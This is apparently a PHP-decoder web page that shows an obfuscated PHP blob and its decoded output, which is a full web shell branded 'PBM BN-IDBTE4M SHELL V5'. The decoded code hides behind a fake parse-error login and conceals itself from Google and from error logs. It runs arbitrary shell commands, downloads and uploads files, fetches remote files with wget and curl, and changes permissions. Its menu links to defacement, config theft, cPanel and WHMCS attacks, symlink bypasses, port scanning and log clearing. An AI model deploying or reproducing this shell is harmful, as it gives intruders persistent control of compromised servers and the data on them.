Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $sempax = 'eJzsvel220iyLvq/1+p3QGv7tOxtS8JAymK55C4OAEiQAIWZQHVdXUwiQIwCwbG7zrPfSACk..

Decoded Output download

$auth_pass = "ad91637a85478915c22c7f1e60d973ed";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
@define('SELF_PATH', __FILE__);
@setcookie("inject", "active", time() + 3600 * 24 * 7);
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
    header('HTTP/1.0 404 Not Found');
    
}
@session_start(); 
@error_reporting(0); 
@ini_set('error_log',NULL); 
@ini_set('log_errors',0); 
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@define('VERSION', '2.1'); 
if( get_magic_quotes_gpc() ) { 
    function stripslashes_array($array) { 
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
    } 
    $_POST = stripslashes_array($_POST); 
} 
function printLogin() { 
    ?> 

<br />
<b>Parse error</b>:  syntax error, unexpected '}' in <b>/home/<?=$_SERVER['HTTP_HOST']?>/</b> on line <b>4366</b><br />


    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff;color:#fff } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    <input type="submit" value=">>>">
    </form></center> 
    <?php 
    exit; 
} 
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
    if( empty( $auth_pass ) || 
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    else 
        printLogin();
      
@ini_set('log_errors',0);
@ini_set('output_buffering',0);   
if(isset($_GET['dl']) && ($_GET['dl'] != "")){
   $file = $_GET['dl'];
   $filez = @file_get_contents($file);
   header("Content-type: application/octet-stream"); 
   header("Content-length: ".strlen($filez)); 
   header("Content-disposition: attachment; filename=\"".basename($file)."\";");
   echo $filez; 
    exit; 
}
elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
   $file = $_GET['dlgzip'];
   $filez = gzencode(@file_get_contents($file));
   header("Content-Type:application/x-gzip
"); 
   header("Content-length: ".strlen($filez)); 
   header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
   echo $filez; 
    exit; 
}
// view image
if(isset($_GET['img'])){
      @ob_clean(); 
      $d = magicboom($_GET['y']);
      $f = $_GET['img'];
      $inf = @getimagesize($d.$f); 
         $ext = explode($f,"."); 
         $ext = $ext[count($ext)-1]; 
          @header("Content-type: ".$inf["mime"]);
          @header("Cache-control: public"); 
        @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
        @header("Cache-control: max-age=".(60*60*24*7));  
          @readfile($d.$f); 
          exit; 
}

// server software
$software = getenv("SERVER_SOFTWARE");
// check safemode
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
// uname -a
$system = @php_uname();
// mysql
function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
// check os
if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
else $win = FALSE; 
// change directory
if(isset($_GET['y'])){
   if(@is_dir($_GET['view'])){
      $pwd = $_GET['view'];
      @chdir($pwd);
   }
   else{
      $pwd = $_GET['y'];
      @chdir($pwd);
   }
}
//hdd
function convertByte($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}

// username, id, shell prompt and working directory
if(!$win){
   if(!$user = rapih(exe("whoami"))) $user = "";
   if(!$id = rapih(exe("id"))) $id = "";
   $prompt = $user." \$ ";
   $pwd = @getcwd().DIRECTORY_SEPARATOR;
}
else {
   $user = @get_current_user();
   $id = $user;
   $prompt = $user." &gt;";
   $pwd = realpath(".")."\";
   // find drive letters
    $v = explode("\",$d); 
   $v = $v[0]; 
    foreach (range("A","Z") as $letter) 
    { 
     $bool = @is_dir($letter.":\");
     if ($bool) 
     { 
         $letters .= "<a href=\"?y=".$letter.":\">[ ";
         if ($letter.":" != $v) {$letters .= $letter;} 
         else {$letters .= "<span class=\"gaya\">".$letter."</span>";} 
         $letters .= " ]</a> "; 
       }    
 } 
}

function testoracle() {
    if (function_exists('ocilogon')) { return showstat("on"); }
    else { return showstat("off"); }
    }

function testmssql() {
    if (function_exists('mssql_connect')) { return showstat("on"); }
    else { return showstat("off"); }
    }

 function showdisablefunctions() {
    if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
    else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
    }
   
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
// server ip
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
// your ip ;-)
$my_ip = $_SERVER['REMOTE_ADDR'];
$admin_id=$_SERVER['SERVER_ADMIN'];
$bindport = "13123";
$bindport_pass = "b374k";

// separate the working direcotory
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
   $pathz = "";
   for($j = 0 ; $j <= $i ; $j++){
      $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
   }
   $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}
   
// rename file or folder
if(isset($_POST['rename'])){
   $old = $_POST['oldname'];
   $new = $_POST['newname'];
   @rename($pwd.$old,$pwd.$new);
   $file = $pwd.$new;
}
if(isset($_POST['chmod'])){ 
   $name = $_POST['name'];
   $value = $_POST['newvalue'];
if (strlen($value)==3){
   $value = 0 . "" . $value;}
   @chmod($pwd.$name,octdec($value));
   $file = $pwd.$name;}
   
if(isset($_POST['chmod_folder'])){
   $name = $_POST['name'];
   $value = $_POST['newvalue'];
if (strlen($value)==3){
   $value = 0 . "" . $value;}
   @chmod($pwd.$name,octdec($value));
   $file = $pwd.$name;}


// print useful info
$buff  = "Software : <b>".$software."</b><br />";
$buff .= "System OS : <b>".$system."</b><br />";
if($id != "") $buff .= "ID : <b>".$id."</b><br />";
$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
$buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
$buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";




function rapih($text){
   return trim(str_replace("<br />","",$text));
}

function magicboom($text){
   if (!get_magic_quotes_gpc()) {
          return $text;
   } 
   return stripslashes($text);
}

function showdir($pwd,$prompt){
   $fname = array();
   $dname = array();
   if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
   else $posix = FALSE;
   $user = "????:????";
   if($dh = @scandir($pwd)){
      foreach($dh as $file){
         if(is_dir($file)){
            $dname[] = $file;
         }
         elseif(is_file($file)){
            $fname[] = $file;
         }
      }
   }
   else{
      if($dh = @opendir($pwd)){
         while($file = @readdir($dh)){
            if(@is_dir($file)){
               $dname[] = $file;
            }
            elseif(@is_file($file)){
               $fname[] = $file;
            }
         }
         @closedir($dh);
      }
   }

   
   sort($fname);
   sort($dname);
   $path = @explode(DIRECTORY_SEPARATOR,$pwd);
   $tree = @sizeof($path);
   $parent = "";
   $buff = "
   <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
    <table class=\"explore\">
   <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>

   ";
   if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
   else $parent = $pwd;  

   foreach($dname as $folder){
      if($folder == ".") {
         if(!$win && $posix){
            $name=@posix_getpwuid(@fileowner($folder));
            $group=@posix_getgrgid(@filegroup($folder));
            $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
         }
         else {
            $owner = $user;
         }
         $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
         <td style=\"text-align:center;\">".$owner."</td><td><center>".substr(sprintf('%o', fileperms($pwd)), -4)."</center></td>
         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">

         <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
         <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
         </form></td>
         
         </tr>

         ";
      }
      elseif($folder == "..") {
         if(!$win && $posix){
            $name=@posix_getpwuid(@fileowner($folder));
            $group=@posix_getgrgid(@filegroup($folder));
            $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
         }
         else {
            $owner = $user;
         }
         $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src=''>   $folder</a></td><td>LINK</td>
         <td style=\"text-align:center;\">".$owner."</td>
         <td><center>".substr(sprintf('%o', fileperms($parent)), -4)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>

         <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
         <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
         </form>
         </td></tr>";
      }
      else {
         if(!$win && $posix){
            $name=@posix_getpwuid(@fileowner($folder));
            $group=@posix_getgrgid(@filegroup($folder));
            $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
         }
         else {
            $owner = $user;
         }
         $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='' />     [ $folder ]</b></a>

         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
         <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
         </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
         <td><center>
         <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."</a>

         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> 
         <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> 
         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" /> 
         <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /> 
         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" 
         onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
      }
   }

   foreach($fname as $file){
      $full = $pwd.$file;
      if(!$win && $posix){
         $name=@posix_getpwuid(@fileowner($folder));
         $group=@posix_getgrgid(@filegroup($folder));
         $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
      }
      else {
         $owner = $user;
      }      
      $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='' />   $file</b></a>

      <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
      <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
      <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
      <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
      <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
      </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
      <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o', fileperms($full)), -4)."</a>

      <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> 
<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> 
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" /> 
<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" /> 
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
      <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
      <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
   }
   $buff .= "</table>";
   return $buff;
}

function ukuran($file){
   if($size = @filesize($file)){
      if($size <= 1024) return $size;
      else{
         if($size <= 1024*1024) {
            $size = @round($size / 1024,2);;
            return "$size kb";
         }
         else {
            $size = @round($size / 1024 / 1024,2);
            return "$size mb";   
         }
      }
   }
   else return "???";
}

function exe($cmd){
   if(function_exists('system')) {
      @ob_start();
      @system($cmd);
      $buff = @ob_get_contents();
      @ob_end_clean();
      return $buff;
   }
   elseif(function_exists('exec')) {
      @exec($cmd,$results);
      $buff = "";
      foreach($results as $result){
         $buff .= $result;
      }
      return $buff;
   }
   elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cmd);
      $buff = @ob_get_contents();
      @ob_end_clean();
      return $buff;
   }
   elseif(function_exists('shell_exec')){
      $buff = @shell_exec($cmd);
      return $buff;
   }
}

function tulis($file,$text){
   $textz = gzinflate(base64_decode($text));
    if($filez = @fopen($file,"w"))
    {
       @fputs($filez,$textz);
       @fclose($file);
    }
}

function ambil($link,$file) { 
   if($fp = @fopen($link,"r")){
      while(!feof($fp)) { 
             $cont.= @fread($fp,1024); 
         } 
         @fclose($fp); 
      $fp2 = @fopen($file,"w"); 
      @fwrite($fp2,$cont); 
      @fclose($fp2); 
   }
}

function which($pr){
   $path = exe("which $pr");
   if(!empty($path)) { return trim($path); } else { return trim($pr); }
}

function download($cmd,$url){
   $namafile = basename($url);
   switch($cmd) {
      case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
      case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
      case 'wfread' : ambil($wurl,$namafile);break;
      case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
      case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
      case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
      case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
      default: break;
   }
   return $namafile;
}

function get_perms($file)
{
   if($mode=@fileperms($file)){
      $perms='';
      $perms .= ($mode & 00400) ? 'r' : '-';
      $perms .= ($mode & 00200) ? 'w' : '-';
      $perms .= ($mode & 00100) ? 'x' : '-';
      $perms .= ($mode & 00040) ? 'r' : '-';
      $perms .= ($mode & 00020) ? 'w' : '-';
      $perms .= ($mode & 00010) ? 'x' : '-';
      $perms .= ($mode & 00004) ? 'r' : '-';
      $perms .= ($mode & 00002) ? 'w' : '-';
      $perms .= ($mode & 00001) ? 'x' : '-';
      return $perms;
   }
   else return "?????";
}

function clearspace($text){
   return str_replace(" ","_",$text);
}
$jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX ? 1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pY ? eVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wf ? D/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41 ? aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw=="; ?>

<html><head><link rel="SHORTCUT ICON" href="http://idbteamroot.wap.sh/image/favicon.ico"><title>-=[[ PBM BN-IDBTE4M SHELL V5 ]]=-</title>
<script type="text/javascript">
function tukar(lama,baru){
   document.getElementById(lama).style.display = 'none';
   document.getElementById(baru).style.display = 'block';
}
</script>
<style type="text/css">
body{
   background:#000000;;
}
a {
text-decoration:none;
}
a:hover{
border-bottom:1px solid #00ff00;
}
*{
   font-size:11px;
   font-family:Tahoma,Verdana,Arial;
   color:yellow;
}
#menu{
   background:#111111;
   margin:8px 2px 4px 2px;
}
#menu a{
   padding:4px 18px;
   margin:0;
   background:#222222;
   text-decoration:none;
   letter-spacing:2px;
   -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
}
#menu a:hover{
   background:#191919;
   border-bottom:1px solid blue;
   border-top:1px solid blue;
}
.td{
   border:1px solid #FFDD00;
   color:yellow;
   background-color:#000000;
}
.olenk{
   border:1px solid #FFDD00;
   color:yellow;
   background-color:#000000;
}
.olenk1{
   border:1px solid #FFDD00;
   color:yellow;
   background-color:#333333;
}
.olenk2{
   border:1px solid #00FF00;
   color:lime;
   background-color:#000000;
}
.olenk3{
   border:1px solid #00FF00;
   color:lime;
   background:#006600;
}
.olenk4{
   color:lime;
}
.olenk5{
   color:red;
}
.olenk6{
   color:cyan;
}
.tabnet{
   margin:15px auto 0 auto;
   border: 1px solid #333333;
}
.main {
   width:100%;
}
.gaya {
   color: #00ff00;
}
.inputz{
   background:#111111;
   border:0;
   padding:2px;
   border-bottom:1px solid #222222;
   border-top:1px solid #222222;
}
.inputzbut{
   background:#111111;
   color:#00ff00;
   margin:0 4px;
   border:1px solid #444444;

}
.inputz:hover, .inputzbut:hover{
   border-bottom:1px solid #00ff00;
   border-top:1px solid #00ff00;
}
.output {
   margin:auto;
   border:1px solid #00ff00;
   width:100%;
   height:400px;
   background:#000000;
   padding:0 2px;
}
.cmdbox{
   width:100%;
}
.head_info{
   padding: 0 4px;
}
.jaya{ font-family: ;}

.b374k{
   font-size:30px;
   padding:0;
   color:#444444;
}
.b374k_tbl{
   text-align:center;
   margin:0 4px 0 0;
   padding:0 4px 0 0;
   border-right:1px solid #333333;
}
.phpinfo table{
   width:100%;
   padding:0 0 0 0;
}
.phpinfo td{
   background:#111111;
   color:#cccccc;
padding:6px 8px;;
}
.phpinfo th, th{
   background:#191919;
   border-bottom:1px solid #333333;
font-weight:normal;
}
.phpinfo h2, .phpinfo h2 a{
   text-align:center;
   font-size:16px;
   padding:0;
   margin:30px 0 0 0;
   background:#222222;
   padding:4px 0;
}
.explore{
width:100%;
}
.explore a {
text-decoration:none;
}
.explore td{
border-bottom:1px solid #333333;
padding:0 8px;
line-height:24px;
}
.explore th{
padding:3px 8px;
font-weight:normal;
}
.explore th:hover , .phpinfo th:hover{
border-bottom:1px solid #00ff00;
}
.explore tr:hover{
background:#111111;
}
.viewfile{
background:#EDECEB;
color:#000000;
margin:4px 2px;
padding:8px;
}
.sembunyi{
display:none;
padding:0;margin:0;
}

</style></head>
<script language='javascript'>
if (document.all||document.getElementById){
var thetitle=document.title
document.title=''
}
var data="Us3 Y0ur br41n biTch ! ! !";
var done=1;
function statusIn(text){
decrypt(text,22,22);
}
function statusOut(){
self.status='';
done=1;
}
function decrypt(text, max, delay){
if (done){
done = 0;
rantit(text, max, delay, 0, max);
} 
}
function rantit(text, runs_left, delay, charvar, max){
if (!done){
runs_left = runs_left - 1;
var status = text.substring(0,charvar);
for(var current_char = charvar; current_char < text.length; current_char++){
status += data.charAt(Math.round(Math.random()*data.length));
}
document.title = status;
var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
var new_char = charvar + 1;
var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
if(runs_left > 0){
setTimeout(rerun, delay);
}
else{
if (charvar < text.length){
setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
}
else
{
done = 1;
}
}
}
}
if (document.all||document.getElementById)
statusIn(thetitle)
</script>

<body onLoad="document.getElementById('cmd').focus();">
<div class="main">
<!-- head info start here -->
<div class="head_info">
<table ><tr>
<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://idbteamroot.wap.sh/image/bn.png" /></span></a></td></tr><tr><td><b>-=[[ PBM 5HELL V5 ]]=-<br>[ Special Edition ]</b></td></tr></table></td>
<td><?php echo $buff; ?></td>

</tr></table>
</div>
<center>

<tr><td>

<center>
<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><nobr><b></b><b><a href="?">HOME</a></b></nobr></td> 
<td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=php">EVAL</a></b></nobr></td> 
<td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">SQL 1</a></b></nobr></td> 
<td style=\"text-align:center;\"><b><a href="?idb=sql">SQL2</a></b></td>
<td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">INFO</a></b></nobr></td> 
</tr></table></div> 

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?roct=olenk2">sym1</a></b></td>
<td style=\"text-align:center;\"><b><a href="?roct=olenk3">sym2</a></b></td>
<td style=\"text-align:center;\"><b><a href="?roct=olenk4">sym3</a></b></td>
<td style=\"text-align:center;\"><b><a href="?roct=olenk5">sym4</a></b></td>
<td style=\"text-align:center;\"><b><a href="?roct=olenk6">sym5</a></b></td> 
<td style=\"text-align:center;\"><b><a href="?roct=olenk7">sym6</a></b></td>
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?idb=deface">Deface</a></b></td>
<td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=jumping">Jump1</a></b></nobr></td>
<td style=\"text-align:center;\"><b><a href="?roct=jump">Jump2</a></b></td> 
 <td style=\"text-align:center;\"><b><a href="?idb=domain">Domain</a></b></td> 
<td style=\"text-align:center;\"><b><a href="?pbm=bypass">Disable</a></b></td>
<td style=\"text-align:center;\"><b><a href="?sws=passwd">Bypass</a></b></td> 
<td style=\"text-align:center;\"><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Sploit</a></b></td> 
</tr></table></div> 

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?idb=auto">Tool</a></b></td>
<td style=\"text-align:center;\"><b><a href="?sws=help">help</a></b></td> 
<td style=\"text-align:center;\"><b><a href="?idb=olenk1">wpinject</a></b></td> 
<td style=\"text-align:center;\"><b><a href="?idb=olenk2">wpauto</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=jomblo">Jomblo1</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk3">Jomblo2</a></b></td> 
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=config">config1</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk4">config2</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk15">config3</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk5">whmcs</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk6">whmcs1</a></b></td>
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?idb=olenk7">extract</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk8">scanport</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk9">clearlog</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk10">encrypt</a></b></td>
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?idb=olenk11">protect</a></b></td>
<td style=\"text-align:center;\"><b><a 
href="?idb=cp">cpanel</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk14">cp deface</a></b></td>
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?idb=olenk12">rwhm</a></b></td>
<td style=\"text-align:center;\"><b><a href="?idb=olenk13">rwhm1</a></b></td>
</tr></table></div>

<div id="menu" align="center"><table><tr>
<td style=\"text-align:center;\"><b><a href="?pbm=telnet">CGI SHELL</a></b></td>
</tr></table></div>
</center>
<div id="menu" align="left">
<table class="cmdbox" style="width:50%;">
<tr>
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post" style="margin:8px 0 0 0;">
<td><nobr><b>CMD $</b></nobr></td>
<td><nobr><input id="cmd" class="olenk" type="text" name="cmd" style="width:300px;" value=""/>
<input class="olenk1" type="submit" value=" >>>" name="submitcmd" style="width:50px;"/>
</nobr>
</td>
</form>
</tr>
<tr>
<form action="" enctype="multipart/form-data" method="post" style="margin:8px 0 0 0;">
<input type="hidden" name="uploadto" value="<?php echo $pwd; ?>"/>
<td><nobr><b>UPLOAD</b></nobr></td>
<td><nobr><input class="olenk" type="file" name="file" style="width:300px;"/> <input type="submit" name="uploads" class="olenk1" value=">>>" style="width:50px;"></nobr>
</td></form></tr>
<tr>
<form action="?" method="get" style="margin:8px 0 0 0;">
<input type="hidden" name="y" value="<?php echo $pwd; ?>"/>
<td><nobr><b>PATH</b></nobr></td>
<td><nobr><input id="goto" class="olenk" type="text" name="view" style="width:300px;" value="<?php echo $pwd; ?>"/> <input  class="olenk1" type="submit" value=" >>>" name="submitcmd" style="width:50px;"/></nobr></form>
</td>
</tr>
</table></div>
<?php
set_time_limit(0);
